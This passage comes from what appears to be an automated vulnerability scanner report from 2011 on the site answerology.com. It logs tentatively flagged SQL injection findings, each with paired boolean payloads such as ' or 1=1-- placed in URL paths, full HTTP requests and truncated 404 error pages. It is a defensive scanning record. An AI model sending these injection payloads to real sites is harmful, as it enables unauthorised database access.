Path:   /cobrands/seventeen/SeventeenLayout.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 21121690'%20or%201%3d1--%20 and 21121690'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cobrands21121690'%20or%201%3d1--%20/seventeen/SeventeenLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:49 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cobrands21121690'%20or%201%3d2--%20/seventeen/SeventeenLayout.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:50 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.32. http://www.answerology.com/cssjs/CharacterCounter.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cssjs/CharacterCounter.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs'%20and%201%3d1--%20/CharacterCounter.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:32 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cssjs'%20and%201%3d2--%20/CharacterCounter.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:33 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=516689755" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=516689755" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=516689755"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=516689755"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=516689755"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.33. http://www.answerology.com/cssjs/CoachesLayout.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cssjs/CoachesLayout.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 18708381'%20or%201%3d1--%20 and 18708381'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs/CoachesLayout.js18708381'%20or%201%3d1--%20?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:43:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

Request 2

GET /cssjs/CoachesLayout.js18708381'%20or%201%3d2--%20?v=1648503221 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/uploaded-images/80181898525213%20or%201%3d1--%20/40x37_thumb.jpg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmv=191590138.hearst%3Alogged%20out; __utma=191590138.125975609.1316294747.1316294747.1316294747.1; __utmb=191590138; __utmc=191590138; __utmz=191590138.1316294747.1.1.utmccn=(referral)|utmcsr=hearst.com|utmcct=/newspapers/metrix4media.php|utmcmd=referral; rsi_segs=; s_ppv=64

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:43:01 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

1.34. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cssjs/countdownTimer.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs'%20and%201%3d1--%20/countdownTimer.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:40 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=698584103"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=698584103"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/Cosm
...[SNIP]...

Request 2

GET /cssjs'%20and%201%3d2--%20/countdownTimer.js?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10403
Date: Sat, 17 Sep 2011 16:27:40 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=1648503221" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=1648503221" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=1648503221"></script>    
<script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=1648503221"></script>

<script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=1648503221"></script>
<script language="JavaScript" type="text/javascript" src="/cobrands
...[SNIP]...

1.35. http://www.answerology.com/cssjs/countdownTimer.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.answerology.com
Path:   /cssjs/countdownTimer.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 23080796'%20or%201%3d1--%20 and 23080796'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cssjs/countdownTimer.js23080796'%20or%201%3d1--%20?v=698584103 HTTP/1.1
Host: www.answerology.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Content-Length: 10382
Date: Sat, 17 Sep 2011 16:27:43 GMT
Connection: close
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: -1
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Answerology Error</title>
<meta name="title" content="Answerology Error" />
<met
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/cssjs/site.css?v=698584103" />
<link rel="stylesheet" type="text/css" href="/cssjs/site2.css?v=698584103" />
<script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.2.6.min.js"></script>
<script type="text/javascript" src="/cssjs/jquery.form.js"></script>
<script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script>
<script type="text/javascript" src="/fckeditor/fckeditor.js"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=698584103"></script>
<script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=698584103"></script>
